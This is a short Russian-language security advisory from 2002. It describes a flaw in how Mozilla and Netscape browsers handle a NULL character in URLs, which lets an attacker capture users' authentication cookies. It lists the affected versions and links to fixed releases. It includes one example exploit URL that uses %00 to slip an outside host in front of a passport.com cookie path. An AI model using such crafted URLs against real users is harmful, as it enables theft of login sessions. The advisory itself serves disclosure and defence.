Перехват куки в Mozilla и Netscape

Дата публикации:
24.01.2002
Всего просмотров:
3521
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Mozilla – популярный, бесплатный Web броузер для большинства Linux и Unix вариантов, MacOS и Microsoft Windows 9x/ME/NT/2000/XP.

Проблема, обнаруженная в Mozilla и Netscape, позволяет нападающему захватывать опознавательные данные на основе куки пользователя уязвимого web-браузера. Проблема находится в обработке NULL символа в URL. Уязвимость найдена в:
Mozilla Browser 0.9.2.1-0.9.6
Netscape Communicator 4.08-4.78
Netscape 6.1-6.2

Пример:

http://alive.znep.com%00www.passport.com/cgi-bin/cookies

Ссылки: Источник
http://www.mozilla.org/releases/
http://home.netscape.com/download/index.html

или введите имя

CAPTCHA